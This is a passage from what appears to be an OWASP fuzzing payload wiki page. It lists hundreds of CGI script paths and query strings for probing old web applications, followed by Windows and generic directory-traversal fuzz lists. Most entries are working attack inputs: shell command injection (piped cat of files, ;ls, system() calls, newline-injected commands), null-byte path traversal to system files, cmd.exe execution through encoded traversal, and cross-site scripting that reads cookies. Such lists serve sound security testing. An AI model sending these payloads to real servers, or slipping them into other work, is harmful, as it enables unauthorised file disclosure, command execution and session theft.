blog/mt.cfg&lt;br /&gt;
bnbform&lt;br /&gt;
bnbform.cgi&lt;br /&gt;
book.cgi?action=default&amp;amp;current=|cat%20{KNOWNFILE}|&amp;amp;form_tid=996604045&amp;amp;prev=main.html&amp;amp;list_message_index=10&lt;br /&gt;
boozt/admin/index.cgi?section=5&amp;amp;input=1&lt;br /&gt;
bsguest.cgi?email=x;ls&lt;br /&gt;
bslist.cgi?email=x;ls&lt;br /&gt;
build.cgi&lt;br /&gt;
bulk/bulk.cgi&lt;br /&gt;
c_download.cgi&lt;br /&gt;
cached_feed.cgi&lt;br /&gt;
cachemgr.cgi&lt;br /&gt;
cal_make.pl?p0=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
calendar&lt;br /&gt;
calendar.php?calbirthdays=1&amp;amp;action=getday&amp;amp;day=2001-8-15&amp;amp;comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22&lt;br /&gt;
calendar.pl&lt;br /&gt;
calendar/calendar_admin.pl?config=|cat%20{KNOWNFILE}|&lt;br /&gt;
calendar/index.cgi&lt;br /&gt;
calendar_admin.pl?config=|cat%20{KNOWNFILE}|&lt;br /&gt;
calender_admin.pl&lt;br /&gt;
campas?%0acat%0a{KNOWNFILE}%0a&lt;br /&gt;
cart.pl&lt;br /&gt;
cart.pl?db='&lt;br /&gt;
cartmanager.cgi&lt;br /&gt;
cbmc/forums.cgi&lt;br /&gt;
ccbill-local.cgi?cmd=MENU&lt;br /&gt;
ccbill-local.pl?cmd=MENU&lt;br /&gt;
cgforum.cgi&lt;br /&gt;
cgi-lib.pl&lt;br /&gt;
cgicso?query=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cgicso?query=AAA&lt;br /&gt;
cgiforum.pl?thesection=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
cgiwrap&lt;br /&gt;
cgiwrap/%3Cfont%20color=red%3E&lt;br /&gt;
cgiwrap/~@U&lt;br /&gt;
cgiwrap/~JUNK(5)&lt;br /&gt;
cgiwrap/~root&lt;br /&gt;
change-your-password.pl&lt;br /&gt;
classified.cgi&lt;br /&gt;
classifieds&lt;br /&gt;
classifieds.cgi&lt;br /&gt;
classifieds/classifieds.cgi&lt;br /&gt;
classifieds/index.cgi&lt;br /&gt;
clickcount.pl?view=test&lt;br /&gt;
clickresponder.pl&lt;br /&gt;
code.php&lt;br /&gt;
code.php3&lt;br /&gt;
com5..........................................................................................................................................................................................................................box&lt;br /&gt;
com5.java&lt;br /&gt;
com5.pl&lt;br /&gt;
commandit.cgi&lt;br /&gt;
commerce.cgi?page=../../../../../../../../../..{KNOWNFILE}%00index.html&lt;br /&gt;
common.php?f=0&amp;amp;ForumLang=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
common/listrec.pl&lt;br /&gt;
common/listrec.pl?APP=qmh-news&amp;amp;TEMPLATE=;ls%20/etc|&lt;br /&gt;
compatible.cgi&lt;br /&gt;
count.cgi&lt;br /&gt;
counter-ord&lt;br /&gt;
counterbanner&lt;br /&gt;
counterbanner-ord&lt;br /&gt;
counterfiglet-ord&lt;br /&gt;
counterfiglet/nc/&lt;br /&gt;
cs&lt;br /&gt;
csChatRBox.cgi?command=savesetup&amp;amp;setup=;system('cat%20{KNOWNFILE}')&lt;br /&gt;
csGuestBook.cgi?command=savesetup&amp;amp;setup=;system('cat%20{KNOWNFILE}')&lt;br /&gt;
csLive&lt;br /&gt;
csNews.cgi&lt;br /&gt;
csNewsPro.cgi?command=savesetup&amp;amp;setup=;system('cat%20{KNOWNFILE}')&lt;br /&gt;
csPassword.cgi&lt;br /&gt;
csPassword/csPassword.cgi&lt;br /&gt;
csh&lt;br /&gt;
cstat.pl&lt;br /&gt;
cutecast/members/&lt;br /&gt;
cvsblame.cgi?file=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cvslog.cgi?file=*&amp;amp;rev=&amp;amp;root=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cvslog.cgi?file=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cvsquery.cgi?branch=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;file=&amp;lt;script&amp;gt;alert(document.domain)&amp;lt;/script&amp;gt;&amp;amp;date=&amp;lt;script&amp;gt;alert(document.domain)&amp;lt;/script&amp;gt;&lt;br /&gt;
cvsquery.cgi?module=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;branch=&amp;amp;dir=&amp;amp;file=&amp;amp;who=&amp;lt;script&amp;gt;alert(document.domain)&amp;lt;/script&amp;gt;&amp;amp;sortby=Date&amp;amp;hours=2&amp;amp;date=week&lt;br /&gt;
cvsqueryform.cgi?cvsroot=/cvsroot&amp;amp;module=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;branch=HEAD&lt;br /&gt;
dansguardian.pl?DENIEDURL=&amp;lt;/a&amp;gt;&amp;lt;script&amp;gt;alert('XSS');&amp;lt;/script&amp;gt;&lt;br /&gt;
dasp/fm_shell.asp&lt;br /&gt;
data/fetch.php?page=&lt;br /&gt;
date&lt;br /&gt;
day5datacopier.cgi&lt;br /&gt;
day5datanotifier.cgi&lt;br /&gt;
db2www/library/document.d2w/show&lt;br /&gt;
db4web_c/dbdirname/{KNOWNFILE}&lt;br /&gt;
db_manager.cgi&lt;br /&gt;
dbman/db.cgi?db=no-db&lt;br /&gt;
dcforum.cgi?az=list&amp;amp;forum=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
dcshop/auth_data/auth_user_file.txt&lt;br /&gt;
dcshop/orders/orders.txt&lt;br /&gt;
dfire.cgi&lt;br /&gt;
diagnose.cgi&lt;br /&gt;
dig.cgi&lt;br /&gt;
directorypro.cgi?want=showcat&amp;amp;show=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
displayTC.pl&lt;br /&gt;
dnewsweb&lt;br /&gt;
donothing&lt;br /&gt;
dose.pl?daily&amp;amp;somefile.txt&amp;amp;|ls|&lt;br /&gt;
download.cgi&lt;br /&gt;
dumpenv.pl&lt;br /&gt;
edit.pl&lt;br /&gt;
empower?DB=whateverwhatever&lt;br /&gt;
emu/html/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
emumail/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
enter.cgi&lt;br /&gt;
environ.cgi&lt;br /&gt;
environ.pl&lt;br /&gt;
environ.pl?param1=&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
erba/start/%3Cscript%3Ealert('XSS');%3C/script%3E&lt;br /&gt;
eshop.pl/seite=;cat%20eshop.pl|&lt;br /&gt;
ex-logger.pl&lt;br /&gt;
excite&lt;br /&gt;
excite;IF&lt;br /&gt;
ezadmin.cgi&lt;br /&gt;
ezboard.cgi&lt;br /&gt;
ezman.cgi&lt;br /&gt;
ezshopper/loadpage.cgi?user_id=1&amp;amp;file=|cat%20{KNOWNFILE}|&lt;br /&gt;
ezshopper/search.cgi?user_id=id&amp;amp;database=dbase1.exm&amp;amp;template=../../../../../../..{KNOWNFILE}&amp;amp;distinct=1&lt;br /&gt;
ezshopper2/loadpage.cgi&lt;br /&gt;
ezshopper3/loadpage.cgi&lt;br /&gt;
faqmanager.cgi?toc={KNOWNFILE}%00&lt;br /&gt;
faxsurvey?cat%20{KNOWNFILE}&lt;br /&gt;
filemail&lt;br /&gt;
filemail.pl&lt;br /&gt;
finger&lt;br /&gt;
finger.pl&lt;br /&gt;
flexform&lt;br /&gt;
flexform.cgi&lt;br /&gt;
fom.cgi?file=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
fom/fom.cgi?cmd=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;file=1&amp;amp;keywords=vulnerable&lt;br /&gt;
formmail&lt;br /&gt;
formmail.cgi&lt;br /&gt;
formmail.cgi?recipient=root@localhost%0Acat%20{KNOWNFILE}&amp;amp;email=joeuser@localhost&amp;amp;subject=test&lt;br /&gt;
formmail.pl&lt;br /&gt;
formmail.pl?recipient=root@localhost%0Acat%20{KNOWNFILE}&amp;amp;email=joeuser@localhost&amp;amp;subject=test&lt;br /&gt;
formmail?recipient=root@localhost%0Acat%20{KNOWNFILE}&amp;amp;email=joeuser@localhost&amp;amp;subject=test&lt;br /&gt;
fortune&lt;br /&gt;
ftp.pl&lt;br /&gt;
ftpsh&lt;br /&gt;
gH.cgi&lt;br /&gt;
gbadmin.cgi?action=change_adminpass&lt;br /&gt;
gbadmin.cgi?action=change_automail&lt;br /&gt;
gbadmin.cgi?action=colors&lt;br /&gt;
gbadmin.cgi?action=setup&lt;br /&gt;
gbook/gbook.cgi?_MAILTO=xx;ls&lt;br /&gt;
gbpass.pl&lt;br /&gt;
generate.cgi?content=../../../../../../../../../../windows/win.ini%00board=board_1&lt;br /&gt;
generate.cgi?content=../../../../../../../../../../winnt/win.ini%00board=board_1&lt;br /&gt;
generate.cgi?content=../../../../../../../../../..{KNOWNFILE}%00board=board_1&lt;br /&gt;
getdoc.cgi&lt;br /&gt;
gettransbitmap&lt;br /&gt;
glimpse&lt;br /&gt;
gm-authors.cgi&lt;br /&gt;
gm-cplog.cgi&lt;br /&gt;
gm.cgi&lt;br /&gt;
guestbook.cgi&lt;br /&gt;
guestbook.cgi?user=cpanel&amp;amp;template=|/bin/cat%20{KNOWNFILE}|&lt;br /&gt;
guestbook.pl&lt;br /&gt;
guestbook/passwd&lt;br /&gt;
handler.cgi&lt;br /&gt;
hitview.cgi&lt;br /&gt;
horde/test.php&lt;br /&gt;
horde/test.php?mode=phpinfo&lt;br /&gt;
hsx.cgi?show=../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
htgrep?file=index.html&amp;amp;hdr={KNOWNFILE}&lt;br /&gt;
html2chtml.cgi&lt;br /&gt;
html2wml.cgi&lt;br /&gt;
htmlscript?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
htsearch.cgi?words=%22%3E%3Cscript%3Ealert%'XSS'%29%3B%3C%2Fscript%3E&lt;br /&gt;
htsearch?-c/nonexistant&lt;br /&gt;
htsearch?config=foofighter&amp;amp;restrict=&amp;amp;exclude=&amp;amp;method=and&amp;amp;format=builtin-long&amp;amp;sort=score&amp;amp;words=&lt;br /&gt;
htsearch?exclude=%60{KNOWNFILE}%60&lt;br /&gt;
ibill.pm&lt;br /&gt;
icat&lt;br /&gt;
if/admin/nph-build.cgi&lt;br /&gt;
ikonboard/help.cgi?&lt;br /&gt;
imageFolio.cgi&lt;br /&gt;
imagefolio/admin/admin.cgi&lt;br /&gt;
imagemap&lt;br /&gt;
include/new-visitor.inc.php&lt;br /&gt;
index.js0x70&lt;br /&gt;
index.pl&lt;br /&gt;
info2www&lt;br /&gt;
info2www '(../../../../../../../bin/mail root &amp;lt;{KNOWNFILE}&amp;gt;&lt;br /&gt;
infosrch.cgi&lt;br /&gt;
ion-p?page=../../../../..{KNOWNFILE}&lt;br /&gt;
jailshell&lt;br /&gt;
jj&lt;br /&gt;
journal.cgi?folder=journal.cgi%00&lt;br /&gt;
ksh&lt;br /&gt;
lastlines.cgi?process&lt;br /&gt;
listrec.pl&lt;br /&gt;
loadpage.cgi?user_id=1&amp;amp;file=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
loadpage.cgi?user_id=1&amp;amp;file=..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini&lt;br /&gt;
log-reader.cgi&lt;br /&gt;
log/&lt;br /&gt;
log/nether-log.pl?checkit&lt;br /&gt;
login.cgi&lt;br /&gt;
login.pl&lt;br /&gt;
login.pl?course_id=\&lt;br /&gt;
logit.cgi&lt;br /&gt;
logs.pl&lt;br /&gt;
logs/&lt;br /&gt;
logs/access_log&lt;br /&gt;
logs/error_log&lt;br /&gt;
lookwho.cgi&lt;br /&gt;
ls&lt;br /&gt;
lwgate&lt;br /&gt;
lwgate.cgi&lt;br /&gt;
magiccard.cgi?pa=3Dpreview&amp;amp;amp;next=3Dcustom&amp;amp;amp;page=3D../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
mail&lt;br /&gt;
mail/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
mail/nph-mr.cgi?do=loginhelp&amp;amp;configLanguage=../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
mailit.pl&lt;br /&gt;
maillist.cgi&lt;br /&gt;
maillist.pl&lt;br /&gt;
mailnews.cgi&lt;br /&gt;
main.cgi?board=FREE_BOARD&amp;amp;command=down_load&amp;amp;filename=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
majordomo.pl&lt;br /&gt;
man2html&lt;br /&gt;
mastergate/search.cgi?search=0&amp;amp;search_on=all&lt;br /&gt;
meta.pl&lt;br /&gt;
mgrqcgi&lt;br /&gt;
mini_logger.cgi&lt;br /&gt;
mmstdod.cgi&lt;br /&gt;
moin.cgi?test&lt;br /&gt;
mojo/mojo.cgi&lt;br /&gt;
mrtg.cfg?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
mrtg.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
mrtg.cgi?cfg=blah&lt;br /&gt;
ms_proxy_auth_query/&lt;br /&gt;
mt-static/&lt;br /&gt;
mt-static/mt-check.cgi&lt;br /&gt;
mt-static/mt-load.cgi&lt;br /&gt;
mt-static/mt.cfg&lt;br /&gt;
mt/&lt;br /&gt;
mt/mt-check.cgi&lt;br /&gt;
mt/mt-load.cgi&lt;br /&gt;
mt/mt.cfg&lt;br /&gt;
multihtml.pl?multi={KNOWNFILE}%00html&lt;br /&gt;
musicqueue.cgi&lt;br /&gt;
myguestbook.cgi?action=view&lt;br /&gt;
namazu.cgi&lt;br /&gt;
nbmember.cgi?cmd=list_all_users&lt;br /&gt;
netauth.cgi?cmd=show&amp;amp;page=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
netpad.cgi&lt;br /&gt;
newsdesk.cgi?t=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
nimages.php&lt;br /&gt;
nlog-smb.cgi&lt;br /&gt;
nlog-smb.pl&lt;br /&gt;
non-existent.pl&lt;br /&gt;
noshell&lt;br /&gt;
nph-emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
nph-error.pl&lt;br /&gt;
nph-exploitscanget.cgi&lt;br /&gt;
nph-maillist.pl&lt;br /&gt;
nph-publish&lt;br /&gt;
nph-publish.cgi&lt;br /&gt;
nph-showlogs.pl?files=../../&amp;amp;filter=.*&amp;amp;submit=Go&amp;amp;linecnt=500&amp;amp;refresh=0&lt;br /&gt;
nph-test-cgi&lt;br /&gt;
ntitar.pl&lt;br /&gt;
opendir.php?{KNOWNFILE}&lt;br /&gt;
orders/orders.txt&lt;br /&gt;
pagelog.cgi&lt;br /&gt;
pals-cgi?palsAction=restart&amp;amp;documentName={KNOWNFILE}&lt;br /&gt;
parse-file&lt;br /&gt;
pass&lt;br /&gt;
passwd&lt;br /&gt;
passwd.txt&lt;br /&gt;
password&lt;br /&gt;
pbcgi.cgi?name=Joe%Camel&amp;amp;email=%3C&lt;br /&gt;
perl&lt;br /&gt;
perl?-v&lt;br /&gt;
perlshop.cgi&lt;br /&gt;
pfdispaly.cgi?'%0A/bin/cat%20{KNOWNFILE}|'&lt;br /&gt;
pfdispaly.cgi?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
pfdisplay.cgi?'%0A/bin/cat%20{KNOWNFILE}|'&lt;br /&gt;
phf&lt;br /&gt;
phf.cgi?QALIA&lt;br /&gt;
phf?Qname=root%0Acat%20{KNOWNFILE}%20&lt;br /&gt;
photo/&lt;br /&gt;
photo/manage.cgi&lt;br /&gt;
photo/protected/manage.cgi&lt;br /&gt;
php-cgi&lt;br /&gt;
php.cgi?{KNOWNFILE}&lt;br /&gt;
plusmail&lt;br /&gt;
pollit/Poll_It_&lt;br /&gt;
pollssi.cgi&lt;br /&gt;
post-query&lt;br /&gt;
post_query&lt;br /&gt;
postcards.cgi&lt;br /&gt;
powerup/r.cgi?FILE=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
printenv&lt;br /&gt;
printenv.tmp&lt;br /&gt;
probecontrol.cgi?command=enable&amp;amp;username=cancer&amp;amp;password=killer&lt;br /&gt;
processit.pl&lt;br /&gt;
profile.cgi&lt;br /&gt;
pu3.pl&lt;br /&gt;
publisher/search.cgi?dir=jobs&amp;amp;template=;cat%20{KNOWNFILE}|&amp;amp;output_number=10&lt;br /&gt;
query&lt;br /&gt;
query?mss=%2e%2e/config&lt;br /&gt;
quickstore.cgi?page=../../../../../../../../../..{KNOWNFILE}%00html&amp;amp;cart_id=&lt;br /&gt;
quikstore.cfg&lt;br /&gt;
quizme.cgi&lt;br /&gt;
r.cgi?FILE=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
ratlog.cgi&lt;br /&gt;
redirect&lt;br /&gt;
register.cgi&lt;br /&gt;
replicator/webpage.cgi/&lt;br /&gt;
responder.cgi&lt;br /&gt;
retrieve_password.pl&lt;br /&gt;
rksh&lt;br /&gt;
rmp_query&lt;br /&gt;
robadmin.cgi&lt;br /&gt;
robpoll.cgi&lt;br /&gt;
rpm_query&lt;br /&gt;
rsh&lt;br /&gt;
rtm.log&lt;br /&gt;
rwcgi60&lt;br /&gt;
rwcgi60/showenv&lt;br /&gt;
rwwwshell.pl&lt;br /&gt;
sawmill5?rfcf+%22{KNOWNFILE}%22+spbn+1,1,21,1,1,1,1&lt;br /&gt;
sawmill?rfcf+%22&lt;br /&gt;
sbcgi/sitebuilder.cgi&lt;br /&gt;
scoadminreg.cgi&lt;br /&gt;
scripts/*%0a.pl&lt;br /&gt;
search.cgi&lt;br /&gt;
search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini&lt;br /&gt;
search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini&lt;br /&gt;
search.php?searchstring=&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
search.pl&lt;br /&gt;
search.pl?Realm=All&amp;amp;Match=0&amp;amp;Terms=test&amp;amp;nocpp=1&amp;amp;maxhits=10&amp;amp;;Rank=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
search.pl?form=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
search/search.cgi?keys=*&amp;amp;prc=any&amp;amp;catigory=../../../../../../../../../../../../etc&lt;br /&gt;
sendform.cgi&lt;br /&gt;
sendpage.pl?message=test\;/bin/ls%20/etc;echo%20\message&lt;br /&gt;
sendtemp.pl?templ=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
session/adminlogin&lt;br /&gt;
sewse?/home/httpd/html/sewse/jabber/comment2.jse+{KNOWNFILE}&lt;br /&gt;
sh&lt;br /&gt;
shop.cgi?page=../../../../../../..{KNOWNFILE}&lt;br /&gt;
shop.pl/page=;cat%20shop.pl|&lt;br /&gt;
shop/auth_data/auth_user_file.txt&lt;br /&gt;
shop/orders/orders.txt&lt;br /&gt;
shopper.cgi?newpage=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
shopplus.cgi?dn=domainname.com&amp;amp;cartid=%CARTID%&amp;amp;file=;cat%20{KNOWNFILE}|&lt;br /&gt;
show.pl&lt;br /&gt;
showcheckins.cgi?person=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
showuser.cgi&lt;br /&gt;
simple/view_page?mv_arg=|cat%20{KNOWNFILE}|&lt;br /&gt;
simplestguest.cgi&lt;br /&gt;
simplestmail.cgi&lt;br /&gt;
smartsearch.cgi?keywords=|/bin/cat%20{KNOWNFILE}|&lt;br /&gt;
smartsearch/smartsearch.cgi?keywords=|/bin/cat%20{KNOWNFILE}|&lt;br /&gt;
sojourn.cgi?cat=../../../../../../../../../../etc/password%00&lt;br /&gt;
spin_client.cgi?aaaaaaaa&lt;br /&gt;
ss&lt;br /&gt;
sscd_suncourier.pl&lt;br /&gt;
ssi//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e{KNOWNFILE}&lt;br /&gt;
start.cgi/%3Cscript%3Ealert('XSS');%3C/script%3E&lt;br /&gt;
stat.pl&lt;br /&gt;
stat/&lt;br /&gt;
stats-bin-p/reports/index.html&lt;br /&gt;
stats.pl&lt;br /&gt;
stats.prf&lt;br /&gt;
stats/&lt;br /&gt;
stats/statsbrowse.asp?filepath=c:\&amp;amp;Opt=3&lt;br /&gt;
stats_old/&lt;br /&gt;
statsconfig&lt;br /&gt;
statusconfig.pl&lt;br /&gt;
statview.pl&lt;br /&gt;
store.cgi?&lt;br /&gt;
store/agora.cgi?cart_id=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
store/agora.cgi?page=whatever33.html&lt;br /&gt;
store/index.cgi?page=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
story.pl?next=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
story/story.pl?next=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
survey&lt;br /&gt;
survey.cgi&lt;br /&gt;
sws/admin.html&lt;br /&gt;
sws/manager.pl&lt;br /&gt;
tablebuild.pl&lt;br /&gt;
talkback.cgi?article=../../../../../../../..{KNOWNFILE}%00&amp;amp;action=view&amp;amp;matchview=1&lt;br /&gt;
tcsh&lt;br /&gt;
technote/main.cgi?board=FREE_BOARD&amp;amp;command=down_load&amp;amp;filename=/../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
test-cgi.tcl&lt;br /&gt;
test-cgi?/*&lt;br /&gt;
test-env&lt;br /&gt;
test.cgi&lt;br /&gt;
test/test.cgi&lt;br /&gt;
texis/junk&lt;br /&gt;
texis/phine&lt;br /&gt;
textcounter.pl&lt;br /&gt;
tidfinder.cgi&lt;br /&gt;
tigvote.cgi&lt;br /&gt;
title.cgi&lt;br /&gt;
tpgnrock&lt;br /&gt;
traffic.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
troops.cgi&lt;br /&gt;
ttawebtop.cgi/?action=start&amp;amp;pg=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
ultraboard.cgi&lt;br /&gt;
ultraboard.pl&lt;br /&gt;
unlg1.1&lt;br /&gt;
unlg1.2&lt;br /&gt;
update.dpgs&lt;br /&gt;
upload.cgi&lt;br /&gt;
uptime&lt;br /&gt;
urlcount.cgi?%3CIMG%20&lt;br /&gt;
ustorekeeper.pl?command=goto&amp;amp;file=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
utm/admin&lt;br /&gt;
utm/utm_stat&lt;br /&gt;
view-source&lt;br /&gt;
view-source?view-source&lt;br /&gt;
view_item?HTML_FILE=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
viewcvs.cgi/viewcvs/?cvsroot=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\&lt;br /&gt;
viewlogs.pl&lt;br /&gt;
viewsource?{KNOWNFILE}&lt;br /&gt;
viralator.cgi&lt;br /&gt;
virgil.cgi&lt;br /&gt;
vote.cgi&lt;br /&gt;
vpasswd.cgi&lt;br /&gt;
vq/demos/respond.pl?&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
w3-msql&lt;br /&gt;
w3-sql&lt;br /&gt;
wais.pl&lt;br /&gt;
way-board.cgi?db={KNOWNFILE}%00&lt;br /&gt;
way-board/way-board.cgi?db={KNOWNFILE}%00&lt;br /&gt;
webais&lt;br /&gt;
webbbs.cgi&lt;br /&gt;
webbbs/webbbs_config.pl?name=joe&amp;amp;email=test@example.com&amp;amp;body=aaaaffff&amp;amp;followup=10;cat%20{KNOWNFILE}&lt;br /&gt;
webcart/webcart.cgi?CONFIG=mountain&amp;amp;CHANGE=YE&lt;br /&gt;
webdist.cgi?distloc=;cat%20{KNOWNFILE}&lt;br /&gt;
webdriver&lt;br /&gt;
webgais&lt;br /&gt;
webif.cgi&lt;br /&gt;
webmail/html/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
webmap.cgi&lt;br /&gt;
webnews.pl&lt;br /&gt;
webplus?about&lt;br /&gt;
webplus?script=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
websendmail&lt;br /&gt;
webspirs.cgi?sp.nextform=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
webutil.pl&lt;br /&gt;
webutils.pl&lt;br /&gt;
webwho.pl&lt;br /&gt;
where.pl?sd=ls%20/etc&lt;br /&gt;
whois.cgi?action=load&amp;amp;whois=%3Bid&lt;br /&gt;
whois.cgi?lookup=;&amp;amp;ext=/bin/cat%20{KNOWNFILE}&lt;br /&gt;
whois/whois.cgi?lookup=;&amp;amp;ext=/bin/cat%20{KNOWNFILE}&lt;br /&gt;
whois_raw.cgi?fqdn=%0Acat%20{KNOWNFILE}&lt;br /&gt;
windmail&lt;br /&gt;
wrap&lt;br /&gt;
wrap.cgi&lt;br /&gt;
ws_ftp.ini&lt;br /&gt;
www-sql&lt;br /&gt;
wwwadmin.pl&lt;br /&gt;
wwwboard.cgi.cgi&lt;br /&gt;
wwwboard.pl&lt;br /&gt;
wwwstats.pl&lt;br /&gt;
wwwthreads/3tvars.pm&lt;br /&gt;
wwwthreads/w3tvars.pm&lt;br /&gt;
wwwwais&lt;br /&gt;
zml.cgi?file=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
zsh&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Windows Directory Traversal   (Update: 17 March 2010  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Windows Directory Traversal   (Update: 17 March 2010&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
../../../../../../../../../../../../localstart.asp%00&lt;br /&gt;
../../../../../../../../../../../../localstart.asp&lt;br /&gt;
\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Generic 8 Directory Deep Traversal Fuzz (17 March 2010) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Generic 8 Directory Deep Traversal Fuzz (17 March 2010) &lt;br /&gt;
# Derived from the awesome &amp;quot;Directory Traversal Fuzzing Code&amp;quot; v0.2 by Luca Carettoni&lt;br /&gt;
# Did some cleanup &amp;amp; removed anything to the right of {FILE} for inclusion in a&lt;br /&gt;
# separate fuzzfile for more flexibiity, for the OWASP Fuzzing Code Database. &lt;br /&gt;
# adam.muntner@uietmove.com &lt;br /&gt;
&lt;br /&gt;
../{FILE}&lt;br /&gt;
../../{FILE}&lt;br /&gt;
../../../{FILE}&lt;br /&gt;
../../../../{FILE}&lt;br /&gt;
../../../../../{FILE}&lt;br /&gt;
../../../../../../{FILE}&lt;br /&gt;
../../../../../../../{FILE}&lt;br /&gt;
../../../../../../../../{FILE}&lt;br /&gt;
..%2f{FILE}&lt;br /&gt;
..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
